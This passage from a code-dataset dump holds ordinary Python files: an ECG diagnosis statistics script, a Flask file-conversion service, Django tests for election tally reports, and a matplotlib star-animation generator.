"line_number": 70, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 76, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 79, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 81, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 82, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 83, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 84, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 85, "usage_type": "call"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 90, "usage_type": "call"}, {"api_name": "geopandas.points_from_xy", "line_number": 90, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 97, "usage_type": "call"}, {"api_name": "geopandas.datasets.get_path", "line_number": 97, "usage_type": "call"}, {"api_name": "geopandas.datasets", "line_number": 97, "usage_type": "attribute"}, {"api_name": "geoplot.polyplot", "line_number": 99, "usage_type": "call"}, {"api_name": "geoplot.crs.NorthPolarStereo", "line_number": 99, "usage_type": "call"}, {"api_name": "geoplot.crs", "line_number": 99, "usage_type": "attribute"}, {"api_name": "geoplot.pointplot", "line_number": 101, "usage_type": "call"}, {"api_name": "geoplot.pointplot", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.savefig", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}]}
+{"seq_id": "191366773", "text": "import os\nfrom configparser import ConfigParser\n\nimport pandas as pd\nfrom ecgpandas.loader import Loader\n\n\ndef statistics(statements, original_statements, lookup):\n print(\"With multi and modifiers\")\n added_and_removed(original_statements, statements)\n\n print(\"With multi and no modifiers\")\n statement_types = lookup.rename(columns={'TopLvlFolder': 'Group'}).Type.to_frame()\n statements = pd.merge(statements, statement_types, left_on='Statement', right_index=True)\n original_statements = pd.merge(original_statements, statement_types, left_on='Statement', right_index=True)\n\n statements = statements.loc[statements.Type == 2]\n original_statements = original_statements.loc[original_statements.Type == 2]\n\n statements.drop('Type', axis=1, inplace=True)\n original_statements.drop('Type', axis=1, inplace=True)\n\n added_and_removed(original_statements, statements)\n\n print(\"No multi and no modifiers\")\n statements = statements.groupby(['PatientID', 'Date'], group_keys=False).filter(lambda g: len(g) == 1)\n original_statements = original_statements.groupby(['PatientID', 'Date'], group_keys=False).filter(lambda g: len(g) == 1)\n\n added_and_removed(original_statements, statements)\n\n print(\"Most important, our data set\")\n iterative_count_differences(original_statements, statements)\n\n\ndef iterative_count_differences(original, statements):\n original.set_index(['PatientID', 'Date'], inplace=True)\n statements.set_index(['PatientID', 'Date'], inplace=True)\n\n original.drop('index', axis=1, inplace=True)\n statements.drop('index', axis=1, inplace=True)\n\n\n original_dict = original.squeeze().to_dict()\n statement_dict = statements.squeeze().to_dict()\n\n total = statements.shape[0]\n changed = 0\n\n for idx in statement_dict.keys():\n if idx in original_dict:\n if statement_dict[idx] != original_dict[idx]:\n changed += 1\n\n\n print(\"Ratio changed records by doctors {}\".format(changed/total))\n\n\ndef added_and_removed(original_statements, statements):\n statements.reset_index(inplace=True)\n original_statements.reset_index(inplace=True)\n records_with_added = statements.merge(original_statements.drop_duplicates(), on=['PatientID', 'Date', 'Statement'],\n how='left', indicator=True)\n records_with_added = records_with_added.loc[records_with_added._merge == 'left_only']\n records_with_added.set_index(['PatientID', 'Date'], inplace=True)\n number_with_added = records_with_added.index.unique().shape[0]\n ratio_records_with_added_statements = number_with_added / statements.index.unique().shape[0]\n print(\"Ratio changed records with added statments by doctors {}\".format(ratio_records_with_added_statements))\n records_with_removed = statements.merge(original_statements.drop_duplicates(),\n on=['PatientID', 'Date', 'Statement'], how='right', indicator=True)\n records_with_removed = records_with_removed.loc[records_with_removed._merge == 'right_only']\n records_with_removed.set_index(['PatientID', 'Date'], inplace=True)\n number_with_removed = records_with_removed.index.unique().shape[0]\n ratio_records_with_removed_statements = number_with_removed / statements.index.unique().shape[0]\n print(\"Ratio changed records with removed statments by doctors {}\".format(ratio_records_with_removed_statements))\n\n\ndef smart_stats(original, statements):\n pass\n\ndef main():\n config_parser = ConfigParser(allow_no_value=True)\n config_parser.read(\"../local.conf\")\n\n path = config_parser.get('Default', 'Path')\n\n statements_path = 
os.path.join(os.path.sep, path, \"SW10\", \"Parsed\", \"with_modifiers\", \"statement.csv\")\n original_statements_path = os.path.join(os.path.sep, path, \"SW10\", \"Parsed\", \"with_modifiers\",\n \"original_statement.csv\")\n\n print(\"Loading statements and machine generated statements\")\n statements = pd.read_csv(statements_path)\n original = pd.read_csv(original_statements_path)\n\n statements.set_index([\"PatientID\", \"Date\"], inplace=True)\n original.set_index([\"PatientID\", \"Date\"], inplace=True)\n\n lookup = Loader(path).load_statement_lookup()\n\n statement_types = lookup.rename(columns={'TopLvlFolder': 'Group'}).Type.to_frame()\n statements = pd.merge(statements, statement_types, left_on='Statement', right_index=True)\n original = pd.merge(original, statement_types, left_on='Statement', right_index=True)\n\n smart_stats(original, statements)\n\n # statistics(statements, original_statements, lookup)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "statistics/original_vs_newdiagnoses.py", "file_name": "original_vs_newdiagnoses.py", "file_ext": "py", "file_size_in_byte": 4657, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.merge", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 15, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 92, "usage_type": "call"}, {"api_name": "ecgpandas.loader.Loader", "line_number": 97, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 101, "usage_type": "call"}]}
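The statistical core of original_vs_newdiagnoses.py is an anti-join: merge with indicator=True, then keep the 'left_only' rows to find records present on one side only. A self-contained toy example of that pattern, with hypothetical column values:

import pandas as pd

before = pd.DataFrame({'PatientID': [1, 1, 2], 'Statement': ['A', 'B', 'A']})
after = pd.DataFrame({'PatientID': [1, 2, 2], 'Statement': ['A', 'A', 'C']})

# Rows present in `after` but absent from `before` (an anti-join):
added = after.merge(before.drop_duplicates(), on=['PatientID', 'Statement'],
                    how='left', indicator=True)
added = added[added['_merge'] == 'left_only'].drop(columns='_merge')
print(added)  # -> the single row PatientID 2, Statement 'C'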
+{"seq_id": "505005378", "text": "import os\nimport logging\nimport traceback\nfrom threading import RLock\nfrom flask import Flask, request, send_file\nfrom tempfile import mkstemp\nfrom werkzeug.wsgi import ClosingIterator\nfrom werkzeug.exceptions import HTTPException\nfrom pantomime import FileName, normalize_mimetype, mimetype_extension\n\nfrom convert.converter import Converter, ConversionFailure\nfrom convert.formats import load_mime_extensions\nfrom .document_types import *\n\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger('convert')\nlock = RLock()\nextensions = load_mime_extensions()\nconverter = Converter()\n\n\nclass ShutdownMiddleware:\n def __init__(self, application):\n self.application = application\n\n def post_request(self):\n if app.is_dead:\n os._exit(127)\n\n def __call__(self, environ, after_response):\n iterator = self.application(environ, after_response)\n try:\n return ClosingIterator(iterator, [self.post_request])\n except Exception:\n traceback.print_exc()\n return iterator\n\n\napp = Flask(\"convert\")\napp.is_dead = False\napp.wsgi_app = ShutdownMiddleware(app.wsgi_app)\n\n\n@app.route(\"/\")\ndef info():\n if app.is_dead:\n return (\"BUSY\", 503)\n return (\"OK\", 200)\n\n\n@app.route(\"/convert\", methods=['POST'])\ndef convert():\n acquired = lock.acquire(timeout=1)\n if app.is_dead or not acquired:\n return (\"BUSY\", 503)\n timeout = int(request.args.get('timeout', 1000))\n upload_file = None\n output_format = request.form.get('format')\n if not output_format in LIBREOFFICE_EXPORT_TYPES:\n return (\"%s format is not supported\" % (output_format), 400)\n try:\n for upload in request.files.values():\n file_name = FileName(upload.filename)\n mime_type = normalize_mimetype(upload.mimetype)\n if not file_name.has_extension:\n file_name.extension = extensions.get(mime_type)\n if not file_name.has_extension:\n file_name.extension = mimetype_extension(mime_type)\n fd, upload_file = mkstemp(suffix=file_name.safe())\n os.close(fd)\n log.info('Convert to %s: %s [%s]',\n output_format, upload_file, mime_type)\n upload.save(upload_file)\n converter.convert_file(upload_file, output_format, timeout)\n output_filename = \"%s.%s\" % (converter.OUT, output_format)\n log.info(\"Send file %s [Mime-type: %s]\" %\n (output_filename, OUTPUT_MIME_TYPES[output_format]))\n return send_file(output_filename,\n mimetype=OUTPUT_MIME_TYPES[output_format],\n attachment_filename=output_filename)\n return ('No file uploaded', 400)\n except HTTPException:\n raise\n except ConversionFailure as ex:\n app.is_dead = True\n return (str(ex), 400)\n except Exception as ex:\n app.is_dead = True\n log.error('Error: %s', ex)\n return ('FAIL', 503)\n finally:\n if upload_file is not None and os.path.exists(upload_file):\n os.unlink(upload_file)\n if os.path.exists(converter.OUT):\n os.unlink(converter.OUT)\n lock.release()\n", "sub_path": "convert/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3240, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 15, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "threading.RLock", "line_number": 17, "usage_type": "call"}, {"api_name": "convert.formats.load_mime_extensions", "line_number": 18, "usage_type": "call"}, {"api_name": "convert.converter.Converter", "line_number": 
19, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 28, "usage_type": "call"}, {"api_name": "werkzeug.wsgi.ClosingIterator", "line_number": 33, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.files.values", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "name"}, {"api_name": "pantomime.FileName", "line_number": 63, "usage_type": "call"}, {"api_name": "pantomime.normalize_mimetype", "line_number": 64, "usage_type": "call"}, {"api_name": "pantomime.mimetype_extension", "line_number": 68, "usage_type": "call"}, {"api_name": "tempfile.mkstemp", "line_number": 69, "usage_type": "call"}, {"api_name": "os.close", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 78, "usage_type": "call"}, {"api_name": "werkzeug.exceptions.HTTPException", "line_number": 82, "usage_type": "name"}, {"api_name": "convert.converter.ConversionFailure", "line_number": 84, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 95, "usage_type": "call"}]}
+{"seq_id": "107541633", "text": "import json\n\nfrom django.test import RequestFactory\n\nfrom tally_ho.libs.permissions import groups\nfrom tally_ho.apps.tally.models.center import Center\nfrom tally_ho.apps.tally.models.candidate import Candidate\nfrom tally_ho.libs.models.enums.form_state import FormState\nfrom tally_ho.libs.models.enums.entry_version import EntryVersion\nfrom tally_ho.libs.models.enums.center_type import CenterType\nfrom tally_ho.apps.tally.views.reports import (\n administrative_areas_reports as admin_reports,\n)\nfrom tally_ho.libs.tests.test_base import (\n create_electrol_race, create_result_form, create_station,\\\n create_reconciliation_form, create_sub_constituency, create_tally,\\\n create_region, create_constituency, create_office, create_result,\\\n create_candidates, TestBase, create_ballot\n)\nfrom tally_ho.libs.tests.fixtures.electrol_race_data import (\n electrol_races\n)\n\n\n\nclass TestAdministrativeAreasReports(TestBase):\n def setUp(self):\n self.factory = RequestFactory()\n self._create_permission_groups()\n self._create_and_login_user()\n self._add_user_to_group(self.user, groups.TALLY_MANAGER)\n self.tally = create_tally()\n self.tally.users.add(self.user)\n self.electrol_race = create_electrol_race(\n self.tally,\n **electrol_races[0]\n )\n ballot = create_ballot(self.tally, electrol_race=self.electrol_race)\n self.region = create_region(tally=self.tally)\n office = create_office(tally=self.tally, region=self.region)\n self.constituency = create_constituency(tally=self.tally)\n self.sc =\\\n create_sub_constituency(code=1, field_office='1', ballots=[ballot])\n center, _ = Center.objects.get_or_create(\n code='1',\n mahalla='1',\n name='1',\n office=office,\n region='1',\n village='1',\n active=True,\n tally=self.tally,\n sub_constituency=self.sc,\n center_type=CenterType.GENERAL,\n constituency=self.constituency\n )\n self.station = create_station(\n center=center, registrants=20, tally=self.tally\n )\n self.result_form = create_result_form(\n tally=self.tally,\n form_state=FormState.ARCHIVED,\n office=office,\n center=center,\n station_number=self.station.station_number,\n ballot=ballot)\n self.recon_form = create_reconciliation_form(\n result_form=self.result_form,\n user=self.user,\n number_ballots_inside_box=20,\n number_cancelled_ballots=0,\n number_spoiled_ballots=0,\n number_unstamped_ballots=0,\n number_unused_ballots=0,\n number_valid_votes=20,\n number_invalid_votes=0,\n number_ballots_received=20,\n )\n votes = 20\n create_candidates(\n self.result_form, votes=votes, user=self.user,\n num_results=1, tally=self.tally\n )\n for result in self.result_form.results.all():\n result.entry_version = EntryVersion.FINAL\n result.save()\n # create duplicate final results\n create_result(self.result_form, result.candidate, self.user, votes)\n\n def test_sub_constituency_turn_out_and_votes_summary_reports(self):\n \"\"\"\n Test that the sub constituency turn out and votes summary reports are\n rendered as expected.\n \"\"\"\n # add\n view = admin_reports.SummaryReportDataView.as_view()\n request = self.factory.post('/sub-constituency-summary-report')\n request.user = self.user\n response = view(\n request,\n tally_id=self.tally.pk,\n region_id=self.region.pk,\n constituency_id=self.constituency.pk\n )\n\n # Sub Constituency votes summary report tests\n code, valid_votes, invalid_votes, cancelled_votes, _, _, _ =\\\n json.loads(\n response.content.decode())['data'][0]\n\n self.assertEquals(\n code, ' | {} | '.format(self.sc.code))\n 
self.assertEquals(\n valid_votes,\n '{} | '.format(\n self.recon_form.number_valid_votes))\n self.assertEquals(\n invalid_votes,\n '{} | '.format(\n self.recon_form.number_invalid_votes))\n self.assertEquals(\n cancelled_votes,\n '{} | '.format(\n self.recon_form.number_cancelled_ballots))\n\n view = admin_reports.ProgressiveReportDataView.as_view()\n request = self.factory.get('/sub-cons-progressive-report-list')\n request.user = self.user\n response = view(\n request,\n tally_id=self.tally.pk,\n region_id=self.region.pk,\n constituency_id=self.constituency.pk)\n candidates_count = Candidate.objects.filter(\n tally__id=self.tally.pk).count()\n\n # Sub Constituency progressive report tests\n code, num_candidates, num_votes, _, _, _ =\\\n json.loads(\n response.content.decode())['data'][0]\n\n self.assertEquals(\n code, '{} | '.format(self.sc.code))\n self.assertEquals(\n num_votes,\n '{} | '.format(\n self.result_form.num_votes))\n self.assertEquals(\n num_candidates,\n '{} | '.format(\n candidates_count))\n\n def apply_filter(self, data):\n view = admin_reports.ResultFormResultsListDataView.as_view()\n request = self.factory.post('/form-results', data=data)\n request.user = self.user\n response = view(\n request,\n tally_id=self.tally.pk,\n )\n return response\n\n def test_result_form_result_list_data_view_filters(self):\n \"\"\"\n Test ResultFormResultsListDataView filters\n \"\"\"\n # test race type filter\n data = {\n \"data\": str(\n {\n \"election_level_names\":\n [\"Presidential\"],\n \"sub_race_type_names\":\n [\"ballot_number_presidential_runoff\"]\n }\n )\n }\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n data = {\n \"data\": str(\n {\n \"election_level_names\": [\"Presidential\"],\n \"sub_race_type_names\": [\"ballot_number_presidential\"]\n }\n )\n }\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n\n # test center filter\n data = {'data': '{\"select_1_ids\": [\"-1\"]}'} # non existent id\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n center_id = self.station.center.id\n data = {'data': '{\"select_1_ids\": ' + f'[\"{center_id}\"]' + '}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n\n # test stations filter\n data = {'data': '{\"select_2_ids\": [\"-1\"]}'} # non existent id\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n station_id = self.station.id\n data = {'data': '{\"select_2_ids\": ' + f'[\"{station_id}\"]' + '}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n\n # test ballot status filter\n data = {'data': '{\"ballot_status\": [\"not_available_for_release\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n data = {'data': '{\"ballot_status\": [\"available_for_release\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n\n # test station filter\n data = {'data': '{\"station_status\": [\"active\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n data = {'data': '{\"station_status\": [\"inactive\"]}'}\n response = self.apply_filter(data)\n 
self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n\n # test candidate status\n data = {'data': '{\"candidate_status\": [\"active\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n data = {'data': '{\"candidate_status\": [\"inactive\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n\n # test station percentage processed\n data = {'data': '{\"percentage_processed\": \"10\"}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n", "sub_path": "tally_ho/apps/tally/tests/views/reports/test_administrative_areas_reports.py", "file_name": "test_administrative_areas_reports.py", "file_ext": "py", "file_size_in_byte": 9528, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tally_ho.libs.tests.test_base.TestBase", "line_number": 26, "usage_type": "name"}, {"api_name": "django.test.RequestFactory", "line_number": 28, "usage_type": "call"}, {"api_name": "tally_ho.libs.permissions.groups.TALLY_MANAGER", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tally_ho.libs.permissions.groups", "line_number": 31, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_tally", "line_number": 32, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_electrol_race", "line_number": 34, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.fixtures.electrol_race_data.electrol_races", "line_number": 36, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_ballot", "line_number": 38, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_region", "line_number": 39, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_office", "line_number": 40, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_constituency", "line_number": 41, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_sub_constituency", "line_number": 43, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.models.center.Center.objects.get_or_create", "line_number": 44, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.models.center.Center.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.models.center.Center", "line_number": 44, "usage_type": "name"}, {"api_name": "tally_ho.libs.models.enums.center_type.CenterType.GENERAL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tally_ho.libs.models.enums.center_type.CenterType", "line_number": 54, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_station", "line_number": 57, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_result_form", "line_number": 60, "usage_type": "call"}, {"api_name": "tally_ho.libs.models.enums.form_state.FormState.ARCHIVED", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tally_ho.libs.models.enums.form_state.FormState", "line_number": 62, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_reconciliation_form", "line_number": 67, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_candidates", "line_number": 80, "usage_type": "call"}, {"api_name": "tally_ho.libs.models.enums.entry_version.EntryVersion.FINAL", "line_number": 85, "usage_type": "attribute"}, 
{"api_name": "tally_ho.libs.models.enums.entry_version.EntryVersion", "line_number": 85, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_result", "line_number": 88, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.SummaryReportDataView.as_view", "line_number": 96, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.SummaryReportDataView", "line_number": 96, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports", "line_number": 96, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 108, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ProgressiveReportDataView.as_view", "line_number": 126, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ProgressiveReportDataView", "line_number": 126, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports", "line_number": 126, "usage_type": "name"}, {"api_name": "tally_ho.apps.tally.models.candidate.Candidate.objects.filter", "line_number": 134, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.models.candidate.Candidate.objects", "line_number": 134, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.models.candidate.Candidate", "line_number": 134, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 139, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ResultFormResultsListDataView.as_view", "line_number": 154, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ResultFormResultsListDataView", "line_number": 154, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports", "line_number": 154, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 180, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 191, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 197, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 202, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 208, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 213, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 219, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 223, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 229, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 233, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 239, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 243, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 249, "usage_type": "call"}]}
+{"seq_id": "261314306", "text": "\"\"\"\nDylan Copley\nMAE 5020\nHomework 1\nProblem 2\n\nSame polygon gen thing except it makes stars... Was showing off to a friend.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport imageio\nimport os\n\n\n#function that plots the polygon, then returns the decoded rgb and image property info\ndef polygon_anim(s):\n # defining angles\n angles = [(360 / (2 * s)) * n for n in range(0, 2 * s)]\n\n # defining points from angles, list comprehension except each value is a list itself. index 0 and 1 are x and y.\n points = [[np.cos(n * (np.pi / 180)), np.sin(n * (np.pi / 180))] for n in angles]\n\n # simply appending the last point as the initial point. This way when lines are needed to be drawn the last points\n # and the initial point will have its line drawn.\n points.append(points[0])\n\n #generated twice the number of angles/vertices. Every other vertice has half the radial length, creating star shape\n for n in range(0, len(points) - 1):\n #modulus operator to test if divisible by 2, same as saying \"every other\", or \"every even\"\n if n % 2 == 1:\n points[n][0] = points[n][0] / 2\n points[n][1] = points[n][1] / 2\n\n #defining a subplot to play around with draw modes\n fig, ax = plt.subplots()\n\n #for each point,\n for n in range(0,len(points)-1):\n #bit tricky to read,\n #plt.plot([x1,x2],[y1,y2],'red line solid dot points')\n #points[n][0] are x value, points[n][1] are y value.\n #have to do a ax subplot plot to send current frame\n ax.plot([points[n][0],points[n+1][0]],[points[n][1],points[n+1][1]],'ro-')\n\n\n #pretifying\n ax.set_title(\"Number of sides: \" + str(s))\n ax.grid(True)\n ax.set_xlim([-2,2])\n #took an image of plot window, discovered that the scaling ratio of x to y was about 1.343\n #this makes the x and y scales the same, and a prettier image.\n ax.set_ylim([-2/1.343,2/1.343])\n #showing origin\n ax.plot([0],[0],'bo')\n\n #maximize and grab current frame. I have no clue how I got this code, I borrowed it from an old program.\n fig.canvas.draw()\n image = np.frombuffer(fig.canvas.tostring_rgb(), dtype='uint8')\n image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n\n #return frame generated\n return image\n\n#getting root directory, need to save the gif file somewhere\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n#very scary function\n#imageio.mimsave((PATH),[list comprehension with each value being a current frame image],fps=n)\n#create a gif file stored in the root directory of the program.\n#list comprehension generating 27 polygons from 3 to 14. defined fps as 4.\n#image is saved as animated_polygon.gif. 
file will overwrite if program ran again\n\nimageio.mimsave((ROOT_DIR + \"\\\\animated_star.gif\"),[polygon_anim(s) for s in range(4,12)], fps=4)", "sub_path": "test_files/star_generator.py", "file_name": "star_generator.py", "file_ext": "py", "file_size_in_byte": 2836, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.cos", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.frombuffer", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 66, "usage_type": "call"}, {"api_name": "imageio.mimsave", "line_number": 74, "usage_type": "call"}]}
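star_generator.py rasterizes each figure with fig.canvas.draw(), converts the canvas to an RGB array, and hands the frame list to imageio.mimsave. Its fig.canvas.tostring_rgb() call is deprecated in recent matplotlib; a sketch of the same frame grab via buffer_rgba (the fps keyword matches imageio v2, as in the record; imageio v3 prefers duration):

import numpy as np
import matplotlib
matplotlib.use('Agg')  # render off-screen
import matplotlib.pyplot as plt
import imageio

def frame(n):
    fig, ax = plt.subplots()
    ax.plot(range(n), [x * x for x in range(n)], 'ro-')
    fig.canvas.draw()
    # Grab the rendered canvas as an RGBA array, then drop the alpha channel.
    image = np.asarray(fig.canvas.buffer_rgba())[:, :, :3]
    plt.close(fig)
    return image

imageio.mimsave('animated.gif', [frame(n) for n in range(2, 10)], fps=4)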
